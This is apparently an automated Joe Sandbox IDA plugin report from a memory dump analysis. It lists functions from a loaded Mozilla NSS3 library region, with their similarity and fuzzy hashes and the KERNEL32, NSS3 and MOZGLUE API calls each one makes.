Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 36b4f52aa5ccfd29904d65bac6f791809734b25468e5bdb5df69bf0aa0d06709
Instruction ID: d44976c806db78487f87ac3d27447ec4633d5c01f4cf1156ab4cb930a3ff3766
Opcode Fuzzy Hash: 36b4f52aa5ccfd29904d65bac6f791809734b25468e5bdb5df69bf0aa0d06709
Instruction Fuzzy Hash: 4D21E139A00625ABD761AF68DA447AA73B8BF05B5CF440134FD0467E42E730A964CBD0

Function 6C7C3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C7C3440: PK11_GetAllTokens.NSS3 ref: 6C7C3481
Part of subcall function 6C7C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C7C34A3
Part of subcall function 6C7C3440: TlsGetValue.KERNEL32 ref: 6C7C352E
Part of subcall function 6C7C3440: EnterCriticalSection.KERNEL32(?), ref: 6C7C3542
Part of subcall function 6C7C3440: PR_Unlock.NSS3(?), ref: 6C7C355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C7AE80C,00000000,00000000,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7C3FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C7AE80C,00000000,00000000,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7C3FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C7AE80C,00000000,00000000,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7C3FFE
PR_SetError.NSS3 ref: 6C7C401A

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: 2d7712e56d7dd74a794873e364a6fcd8ed14be753ab3355fe521e9b60a0caaf8
Instruction ID: 4c0e296dfa3ec90d58613d26c324b0bf77d6979426c2005e0e773c41177d5ff8
Opcode Fuzzy Hash: 2d7712e56d7dd74a794873e364a6fcd8ed14be753ab3355fe521e9b60a0caaf8
Instruction Fuzzy Hash: 343160746047058FD710AF69D6886AABBF0FF84318F11597DD8898BB01EB30E984CB92

Function 6C7B4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B5064

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: a027763d8ca98c54949453760c6290b9feea35459b9f12b7e8d60afa1f9060c2
Instruction ID: 3836a0887d097398c2af0479ce921bf56860480e5b5b09e54b3ef7dd3709ec1e
Opcode Fuzzy Hash: a027763d8ca98c54949453760c6290b9feea35459b9f12b7e8d60afa1f9060c2
Instruction Fuzzy Hash: AE3116B4A056068FDB40EF78D58466ABBF4FF08308B158539E859D7B01E730E990CBD1

Function 6C7E2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7E2E08

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C7E2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C7E2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7E2E95

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 0bf9ec8fc506f9899080fb008a908a99e884f076d3db0ec8f05a67056932d27b
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 6F2129B2E003564BE700CF549E4C7AA3768AF9530CF260379DD085B742F7B1E598C292

Function 6C79ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C79ACC2

Part of subcall function 6C772F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C772F0A
Part of subcall function 6C772F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C772F1D

Part of subcall function 6C772AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C770A1B,00000000), ref: 6C772AF0
Part of subcall function 6C772AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C772B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C79AD5E

Part of subcall function 6C7B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C77B41E,00000000,00000000,?,00000000,?,6C77B41E,00000000,00000000,00000001,?), ref: 6C7B57E0
Part of subcall function 6C7B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C7B5843

CERT_DestroyCertList.NSS3(?), ref: 6C79AD36

Part of subcall function 6C772F50: CERT_DestroyCertificate.NSS3(?), ref: 6C772F65
Part of subcall function 6C772F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C772F83

free.MOZGLUE(?), ref: 6C79AD4F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 605ca0bbdca37a3856d683c59413c6db717d3d3860936c9cf3ff2c7eb9815d09
Instruction ID: e48584b79881dac24f78b49b7c23b702bbf5b2b29ce69eac56e3585dd4168cf1
Opcode Fuzzy Hash: 605ca0bbdca37a3856d683c59413c6db717d3d3860936c9cf3ff2c7eb9815d09
Instruction Fuzzy Hash: 7421D5B1D012188BEF20DF68EA0A5EEB7B4EF05218F054078D8157B711FB31AA49CBE1

Function 6C7C3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7C3C9E
EnterCriticalSection.KERNEL32(?), ref: 6C7C3CAE
PR_Unlock.NSS3(?), ref: 6C7C3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C7C3D02

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 60a0a5b5bef3ac4d853160931487dfc501adecfd24c87779d82b85dc798ac7c3
Instruction ID: c8cc1d7aa2e5c2084e1919b59a282f4964bebec4530a8d273bc381ca14e25bad
Opcode Fuzzy Hash: 60a0a5b5bef3ac4d853160931487dfc501adecfd24c87779d82b85dc798ac7c3
Instruction Fuzzy Hash: 5211B479A00205AFDB10AF28D949ADA3778EF09368F154474FC048B712D730ED54C7E1

Function 6C7CECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C7CF0AD,6C7CF150,?,6C7CF150,?,?,?), ref: 6C7CECBA

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C7CECD1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C7CED02

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C7CED5A

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 015ef539dd593c02d58a54bd8e6401087966d9ae9e944c36f4bae413ee09b6c5
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: A521D4B1A017425FE700CF25DA49B52B7E4BFA4308F25C225E81C87661E770E594C7D1

Function 6C7FEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEE14

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(?,?,6C7E9767,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEE33

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 183d5cadef1aa9186cb96808c97cf489ac15f371bf7a947d443800ba532a22bc
Instruction ID: 85911fda0f079382e66a08440fb0e928e0e066368f5dbdd7bebeade5d6fdcab2
Opcode Fuzzy Hash: 183d5cadef1aa9186cb96808c97cf489ac15f371bf7a947d443800ba532a22bc
Instruction Fuzzy Hash: 0511A7B1A0470AABE7209E65EEC4B0673ACEB0035CF104535E92983F01E330F455C7E1

Function 6C77DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C7906A0: TlsGetValue.KERNEL32 ref: 6C7906C2
Part of subcall function 6C7906A0: EnterCriticalSection.KERNEL32(?), ref: 6C7906D6
Part of subcall function 6C7906A0: PR_Unlock.NSS3 ref: 6C7906EB

CERT_NewCertList.NSS3 ref: 6C77DFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C77DFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C77DFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77E029

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: 959eba2421e7ac18355ef548e2cb025e13293fb7857c567b3859673e8d3a21e7
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: 7411C671A0420EAFDF301AA95E4CBEF76A8AB41358F240938E91887B00E736C814D6F1

Function 6C798DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C798DE7
EnterCriticalSection.KERNEL32 ref: 6C798DFC
PR_Unlock.NSS3 ref: 6C798E2D
PR_SetError.NSS3 ref: 6C798E49

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0ea4635a426461dd80599a52b0c45f02127b5c8736158c595e464fb7295fe0a5
Instruction ID: 2184b96a43ecadf109988b4e0ea2b6817e8c745853c7acea71149e495284b12d
Opcode Fuzzy Hash: 0ea4635a426461dd80599a52b0c45f02127b5c8736158c595e464fb7295fe0a5
Instruction Fuzzy Hash: 29118F75A056019BDB10AF78D548569BBF4FF05318F014939DC88D7B01E730E854CBC1

Function 6C81AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C805F17,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C805F17,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACDB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 7a6276d1943769a6bf820f5146f3cd9af62ba0c20566ec0ccfd3680b0f37be5e
Instruction ID: 3e329cfe52c9c7e8a2f47c36f8c86cb97562d39b7e9704fdf5637f450d2ef416
Opcode Fuzzy Hash: 7a6276d1943769a6bf820f5146f3cd9af62ba0c20566ec0ccfd3680b0f37be5e
Instruction Fuzzy Hash: 70015EB1601B029BEB60DF2ADA09793B7E8BF00699B114839D85AD3E00E735F159CBD1

Function 6C781DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C781DFB

Part of subcall function 6C7795B0: TlsGetValue.KERNEL32(00000000,?,6C7900D2,00000000), ref: 6C7795D2
Part of subcall function 6C7795B0: EnterCriticalSection.KERNEL32(?,?,?,6C7900D2,00000000), ref: 6C7795E7
Part of subcall function 6C7795B0: PR_Unlock.NSS3(?,?,?,?,6C7900D2,00000000), ref: 6C779605

PR_EnterMonitor.NSS3 ref: 6C781E09

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

Part of subcall function 6C77E190: PR_EnterMonitor.NSS3(?,?,6C77E175), ref: 6C77E19C
Part of subcall function 6C77E190: PR_EnterMonitor.NSS3(6C77E175), ref: 6C77E1AA
Part of subcall function 6C77E190: PR_ExitMonitor.NSS3 ref: 6C77E208
Part of subcall function 6C77E190: PL_HashTableRemove.NSS3(?), ref: 6C77E219
Part of subcall function 6C77E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77E231
Part of subcall function 6C77E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77E249
Part of subcall function 6C77E190: PR_ExitMonitor.NSS3 ref: 6C77E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C781E37
PR_ExitMonitor.NSS3 ref: 6C781E4A

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: e7f6b2547dc1ad1a34b8904b0b01788926976636caebf83ddf302e9fa8be2742
Instruction ID: e7eb845f887d243b9799adca5c4bd25bbf6f013bc3bce49e850d6c90f28593c9
Opcode Fuzzy Hash: e7f6b2547dc1ad1a34b8904b0b01788926976636caebf83ddf302e9fa8be2742
Instruction Fuzzy Hash: 7101F271B0216097EB204A69EE04F8677B8AB41B4EF100035EA38E7F91E731E814CBE1

Function 6C781D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C781D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C781D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C781D9C
free.MOZGLUE(00000000), ref: 6C781DB8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 130a8131d78d3f71b60beca1b3d46264eb08f08e7f524258b19ebf399ca825b4
Instruction ID: 8baa4b6632cb8713a2d19485235f05d6361c4fcb507dad2bc7f813ffddb93ada
Opcode Fuzzy Hash: 130a8131d78d3f71b60beca1b3d46264eb08f08e7f524258b19ebf399ca825b4
Instruction Fuzzy Hash: 55F0F4B2A0261057FF205F1AAE47B873658EB81B98F110636DF299BF41D761E80486F1

Function 6C81AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC2D

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
